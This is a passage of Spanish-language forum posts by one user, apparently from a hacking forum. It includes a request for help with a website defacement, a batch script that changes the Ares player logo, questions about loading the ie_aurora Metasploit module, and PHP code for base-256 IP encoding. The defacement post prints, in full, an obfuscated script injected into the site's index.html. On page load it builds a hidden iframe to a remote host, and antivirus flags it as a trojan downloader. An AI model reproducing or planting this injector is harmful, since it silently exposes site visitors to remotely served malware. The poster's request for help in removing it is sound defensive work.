Mensajes

Es un servidor gratuito? un wordpress?

Si, es un servidor gratuito

Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas

Ok  , ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas.
AH! tambien cambie la contraseña de mi host

Saludos 

Borra las Cookies, el historial de navegación y los archivos temporales de internet.

Listop 

Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo  asi que...

si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web  por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error.

Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron 

Saludos, espero que alguien pueda ayudarme 

Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano.  Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto 

Código [Seleccionar] Expandir

<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo

:'( ayudaaaaaaaaaaaaaaaaaa

EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta  es un archivo .js se llama  sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa???????????? 

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox 

Alguien lo podria subir a un server MEGAUPLOAD o RAPIDSHARE!! Porfavor!! 

Bueno, aburrido decidi codear esto  , espero que les sirva  como dice el titulo cambia el logo del Ares que esta en Reproductor  

Para poder utilizarlo hay que saber algunos puntos:

-Deben poner el fondo que quieren poner en el Escritorio.
-El archivo tiene que ser .bmp
-Si estas bajo Windows Vista debes Ejecutarlo como Administrador (Como se hace esto? simple, Boton Secundario -> ejecutar como administrador).

##Mini Explicacion (Funcionamiento) ##
Lo primero que hace el programa al abrirlo tres opsiones, oviamente vamos a elegir
la opsion 1. Luego nos pide el nombre del archivo (que tiene que estar en el escritorio al igual que programa) sin su extension, es decir, si nuestro archivo se llama Myimage.bmp hay que poner Myimage solamente.

En el segundo paso nos pide el nombre del Skin actual que tenemos en el Ares, hacemos lo siguiente:
-Abrimos el Ares
-Vamos a: Panel de Control -> pestaña Skin.

Ahi nos fijamos que skin tiene y lo ponemos en el programa. Listo, Espero que les funcione, cualquier duda, postear no cuesta nada >_<  

Código (dos) [Seleccionar] Expandir


@echo off
title AresBackGround_Changer (ABC)
REM COPYRIGHTS TODOS LOS DERECHOS RESERVADOS >_<!
REM darkgx

IF EXIST "%programfiles%\Ares\temp" (goto menu) else goto make
:make
MKDIR "%programfiles%\Ares\temp"

:menu
CLS
ECHO 1.Cambiar Logo
ECHO 2.Volver a la normalidad
ECHO 3.Salir
SET /p op=Opsion--:

if not defined op goto error

IF %op%==1 (goto change) else goto op2
:op2
IF %op%==2 (goto normal) else goto op3
:op3
IF %op%==3 (goto exit) else goto error


REM  **** MENU PARA CAMBIAR EL FONDO******
:change
CLS
ECHO Ingrese el nombre de la imagen (que esta en su escritorio) que quiere poner en el Ares de fondo (sin su extension).
ECHO ejemplo: myimage
SET /p img=Imagen--:
CLS

ECHO Ingrese el nombre del skin que tiene actualmente su Ares:
SET /p skin=Skin--:

REM COPIANDO EL ARCHIVO logo.bmp
IF EXIST "%programfiles%\Ares\temp\logo.bmp" (goto de) else goto do
:do
COPY /y "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" "%programfiles%\Ares\temp"

:de
IF NOT EXIST "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" (goto mo) else goto mi

:mi
DEL /f /q "%programfiles%\Ares\data\GUI\%skin%\logo.bmp"

:mo
REN %userprofile%\Desktop\%img%.bmp logo.bmp
COPY /y "%userprofile%\Desktop\logo.bmp" "%programfiles%\Ares\data\GUI\%skin%"

TASKKILL /f /im "Ares.exe"
CLS
ECHO Cambio completado
ECHO.
ECHO PRESIONE ENTER

PAUSE > NUL
goto menu


REM **** VOLVER A LA NORMALIDAD AL FONDO *****
:normal
CLS
ECHO ingrese el nombre del skin donde se encuentra el fondo actual:
SET /p skin2=Skin--:

DEL /f /q "%programfiles%\Ares\data\GUI\%skin2%\logo.bmp"
COPY /y "%programfiles%\Ares\temp\logo.bmp" "%programfiles%\Ares\data\GUI\%skin2%"

ECHO.
ECHO PRESIONE ENTER PARA SEGUIR
TASKKILL /f /im "Ares.exe"
PAUSE > NUL
goto menu

:exit
exit

:error
CLS
ECHO OPSION INVALIDA, VUELVA A INTENTARLO
PAUSE > NUL
goto menu




PD:
todavía tengo que mejorarlo, asique con tiempo le hare algunos cambios. Si alguien me podria decir si funciona en Windows XP  , en Vista funciona bien.

Acepto Comentarios, Criticas...  

Saludos!

EDIT:
No puede haber 2 archivos logo.bmp asi que cuando van a cambiar a otro fondo entonces borren el logo.bmp que quedo en el escritorio del fondo anterior (se entendió?).

Disculpen, esta compilado ya? porque no tengo el VB

Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..

[s]

ahh ya encontre esa ruta... es que tu dijiste que creemos una carpeta xD y yo cree una y lo puse en windir... xD
Bueno encontre la ruta  exploits/windows/browser. hay muchos archivos .rb.

No, no modifique el nombre. ya estaba como ie_aurora. Ahora intente cargar un archivo de la carpeta browser que no sea el ie_aurora.rb y funciono bien.. pero no me funciona el ie_aurora   me sige apareciendo el mismo error.  

Código [Seleccionar] Expandir

[-] Failed to load module: exploits/windows/browser/ie_aurora

es raro que carge todos menos el aurora no?..

EDIT:
Algunos archivos me los habia detectado el antivirus. Me los habia puesto en cuarentena pero ya los volvi a su lugar... quizas si desactivo el UAC?...

2doEDIT!:
Error mio!!! arreglado!!
habia puesto exploits y en realidad era exploit! sin la "s" xD sorry

Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo

Código [Seleccionar] Expandir

use windows/exploits/ie_aurora
me dice

Código [Seleccionar] Expandir

Failed to load module: windows/exploits/ie_aurora
no se porque pasa... me podrian ayudar?

Mi O.S: Win Vista

Hola, bueno les traigo un Codificador y Decodificador de IP's en base 256. ¿Para que nos servira esto? enviar peticiones DCC en mirc, ya que al enviarlo la IP tiene que estar codificada. Bueno espero que les sirva.  
//CODIFICADOR//

Código (php) [Seleccionar] Expandir

<?php
//Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
//Fecha: 1/1/2010

$a=186;
$b=23;
$c=205;
$d=165
;
$res=($a*16777216+$b*65536+$c*256+$d*1);
print("La IP codificada es :".$res);
?>
USO:
Para usarla solo tienen que poner los cuatro numeros de la IP en a, b, c y d Y luego les va a decir la IP codificada.

//DECODIFICADOR//

Código (php) [Seleccionar] Expandir

<?php
//Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
//Fecha: 1/1/2010

$ip=3645183495;
$a=$ip/16777216; //PRIMER N° DE LA IP

settype($a,"integer");
settype($var,"integer");

$b=($ip-($a*16777216));
settype($b,"integer");
$c=$b/65536; // SEGUNDO N° DE LA IP
settype($c,"integer");
$d=$c*65536;
$e=($b-$d);
$f=($e/256); // TERCER N° DE LA IP
settype($f,"integer");
$g=($f*256);
$h=($e-$g); //CUARTO N° DE LA IP

print("La ip decodificada es: ".$a.".".$c.".".$f.".".$h);
?>Para decodificarla solo pongan la IP codificada  (primero borren la ip de ejemplo) en la variablae $ip=(IP A DECODIFICAR)

Bueno espero que les sirva y si lo postean en otro lado no estaria demas poner su autor tambien   . Graxias y Saludos y feliz año nuevo para todos.

PD:
Opiniones, criticas y comentarios son bienvenidos!.
Darkgx